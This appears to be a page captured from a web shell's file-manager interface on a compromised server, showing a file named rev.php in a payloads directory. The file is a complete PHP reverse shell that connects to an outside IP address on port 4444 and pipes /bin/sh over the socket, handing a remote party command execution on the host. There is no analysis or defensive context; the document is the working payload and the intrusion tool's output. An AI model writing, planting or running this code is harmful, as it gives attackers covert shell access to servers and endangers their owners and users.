Your IP : 216.73.216.79


Current Path : /proc/thread-self/root/opt/payloads/
Upload File :
Current File : //proc/thread-self/root/opt/payloads/rev.php

<?php
$sock=fsockopen("47.254.251.242",4444);
$proc=proc_open("/bin/sh",array(0=>$sock,1=>$sock,2=>$sock),$pipes);
?>